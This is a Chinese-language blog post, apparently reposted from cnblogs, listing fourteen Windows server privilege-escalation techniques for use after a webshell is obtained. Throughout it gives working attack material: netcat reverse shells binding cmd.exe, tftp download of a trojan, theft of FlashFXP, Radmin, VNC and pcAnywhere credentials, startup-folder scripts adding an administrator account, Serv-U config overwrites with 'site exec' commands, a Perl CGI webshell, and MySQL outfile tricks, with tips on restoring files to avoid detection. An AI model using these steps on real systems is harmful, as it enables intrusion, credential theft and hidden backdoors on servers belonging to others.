各种提权总结

it2022-05-07  0

需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录

解决终端mstsc /console /v:你的服务器IP:远程端口IIS管理器 快捷:inetmgr.exe=============================================================================================================================1. pcAnywhere提权:Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/     pcAnywhere :cif文件 链接不成功可能是端口改了。5632端口 新:有些服务器的cif文件下载的时候受损,可以自己上传个cif文件去。然后再连接

-----------------------------------------------------------------------------------------------------------------------------nc命令:2.nc反弹提权:

服务器执行:   nc位置 -l -p 8080 -t -e cmd位置

监听本地入栈信息                                 

NC地址                             cmd地址 ---------------------------------------------------                -p port 打开本地端口本地执行:        telnet + 服务器IP地址 + 446---------------------------------------------------                -t 以telnet形式应答入栈请求传马命令:        tftp -i ip地址 get 木马名字.exe        -e 程序重定向

额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。2.降低运行权限

现在本地监听一个端口。

nc -vv -l -p 8080

最好是80或8080这样的端口,被防火墙拦截的几率小很多。

在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe

============================================================================================================================

3.flashFXP提权:文件地址 C:\Program FlashFXP   下载Sites.dat文件Stats.dat文件quick.dat文件粘贴本机   FlashFXP Sites.dat               

                  ============================================================================================================================

4.radmin提权:

1.第一种:前提开启Remote服务。 注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters2.导出:regedit /e 导出路径.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters 下载3.步骤:OllyDBG打开 radmin控制端(客户端)               然后执行 ctrl+f 搜索 JMP EAX               然后按一下F4 再按F8               然后再 右键-查找-所有常量              输入 10325476 (很好记的 反过来就是76543210)               在弹出的窗口中 选择第一行 F2下断               然后F9 运行               这时 用radmin连接 入侵的服务器               弹出输入密码的提示框 随便输入密码               等你输入完 后 OD也就激活了               这时 你要先运行下Ctrl+F9 再往上几行 选中红色的那块 就是刚才下断的地方               再次 按F2 一下 取消断点 然后再按 F8 这时 鼠标往下走 找到               ADD ES,18 这里 按一下F4               这时 你在左下角的 hex 那里 随便找个地方点一下               然后 运行Ctrl+G 在弹出的栏里 输入 [esp] 注意带大括号的               然后 就注意把第一行 复制替换成 刚才我们得到的radmin密码的hash值               后按F9 运行               "Port"=hex:00,00,00,00 是连接服务端时用的端口,这里是默认的4489.

第二种:导出--下载---上传本地---覆盖

=============================================================================================================================

5.SAN提权:地址C:\WINDOWS\repair    比较垃圾的一种提权                  C:\WINNT\system32\config\ 下他的SAM 破解之

============================================================================================================================

6.写启动项提权: C:\Documents and Settings\All Users\「开始」菜单\程序\启动                     @echo off                     net user 123 123 /add                     net localgroup administrators 123 /add                     保存bat文件                                                                                @echo off                                       net share c$ /del                    防护脚本                                       net share d$ /del                                       net share e$ /del                                       net share ipc$ /del                                      net share admin$ /del                      保存vbs文件                                           set wsnetwork=CreateObject("WSCRIPT.NETWORK")                                           os="WinNT://"&wsnetwork.ComputerName                                           Set ob=GetObject(os)                                           Set oe=GetObject(os&"Administrators,group")                                           Set od=ob.Create(user",123")                                           od.SetPassword "123"                                           od.SetInfo                                           Set of=GetObject(os&"/123",user)                                           oe.add os&"/123

============================================================================================================================

7.serv-u 有权限改写提权: (要有修改权限,这个提权需要的权限比较大)找到ServUDaemon.ini文件 User数字=123|1|0[USER=123|1]Password=gn3436a2a7150feb9edf0151aec2bcbde2   (密码前俩位要看上面参数,密码是 111111 )HomeDir=c:\        (Windows目录)TimeOut=600Access1=C:\|RWAMLCDP

在第一项最下面写上:ReloadSettings=True(就是不需要重启)修改后cdm ftp   输入:

cd windows   (2003)

cd system32

FTP 命令quote site exec net user 123 123 /addquote site exec net localgroup administrators 123 /addquote site exec net user 123 /del

[USER=123|1]Password=gn3436a2a7150feb9edf0151aec2bcbde2          1234567HomeDir=c:\TimeOut=600Maintenance=System Access1=C:\|RWAMELCDPAccess2=d:\|RWAMELCDPAccess3=e:\|RWAMELCDP

============================================================================================================================

8.serv_u ftp本地溢出提权:               上传--cmd运行(或asp。php运行)---在运行口令:盘符+上传名称.exe "net user 123 123 /add"                盘符+上传名称.exe "net localgroup administrators 123 /add"                注意:    管理员改密码需要下载: ServUDaemon.exe 然后本地破解

============================================================================================================================

9.serv-u ftp覆盖提权:将本地配置的ServUDaemon.ini上传并覆盖原始ServUDaemon.ini,(备份原webwell的serv-u,建立后门后要进行还原)。  

使用命令cd windows cd system32quote site exec net.exe user 123 123 /add 修改提权:密码是Password=gn3436a2a7150feb9edf0151aec2bcbde2    1234567注:如果没弄明白上面可以用这个:     1.首先下载serv-u本地配置生成一个ServUDaemon.ini(要配置权限要大)     2.然后上传到服务器serv-u里覆盖(上传前先备份网站ServUDaemon.ini文件,等提权后在换回来,防止发现)     3.执行cmd      ftp 远程IP       用户名       密码       cd windows       cd system32       quote site exec net.exe user 123 123 /add       quote site exec net.exe localhost administrators 123 /add

=============================================================================================================================

10.serv-u 端口转发提权:       1在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改)      2 在本机运行 lcx -listen 5000 21       (lcx地址要写对)      3 打开本地的serv u 在IP上填入127.0.0.1

      帐号:LocalAdministrator 密码:#l@$ak#.lk;0@P   (密码帐号有可能改 自己下文件看密码)      此时的链接过程是本机连接21端口----转发往本机5000端口-----管道连接至远程机5000端口------转发至远程43958端口    连接成功后,在本机登录的serv-u相当于远程的serv-u   可以ftp本机IP 输入上面的帐号 密码 在远程ftp服务器执行命令.

=============================================================================================================================

11.VNC提权:

HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 读取。破解由10进制破解到16进制 (本机自带科学计算器)VNC占用端口号5900(看一下有没有5900端口)

c:\>vncx4 -W         ( 破解工具)             

导出cmd命令:c:\Windows\regegit -e 123.reg HKEY_GURRENT_USER\Software\ORL\WinVNC3\(c;\\可能是d。e。f。盘等看系统盘在哪)   破解工具vncx4.exe

=============================================================================================================================

12.HASH破解提权:

(入侵机房)2003系统:先SAMInside看帐户,后lc5破解 2000系统:直接用findpass、mt、aio等cmd下直接破解(对于机房,大量机器控制)

对于2000用户我们可以直接用findpass、mt、aio等工具

对于2003用户我们可以用findpass2003、aio去试下.

=============================================================================================================================

13.perl提升权限:      #!/usr/bin/perl      binmode(STDOUT);      syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);      $_ = $ENV{QUERY_STRING};      s/ / /ig;      s///\//ig;      $execthis = $_;      syswrite(STDOUT, "      \r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);      close(STDERR);      close(STDOUT);      exit;保存为cmd.pl上传至BIN目录执行,(不能执行的时候保存后缀cgi)           c:\prel或D.E.F.或webwell根目录执行的时候后面打个?符号,然后直接执行cmd命令 具有最高管理权限可直接加帐号密码有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中.

=============================================================================================================================

14.MYSQL提权:

查看当前权限:在root连接成功后,不能执行命令的办法

select '123' into outfile 'c:/windows/111.txt'                        

net user 123 123 /add & net localgroup administrators123 /add                       

实践证明 合成一句的效果比较好吧,反正个人这么认为

C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\1.bat

C:\Documents and Settings\All Users\「开始」菜单\程序\启动

转载于:https://www.cnblogs.com/amwld/archive/2011/09/04/2166629.html


最新回复(0)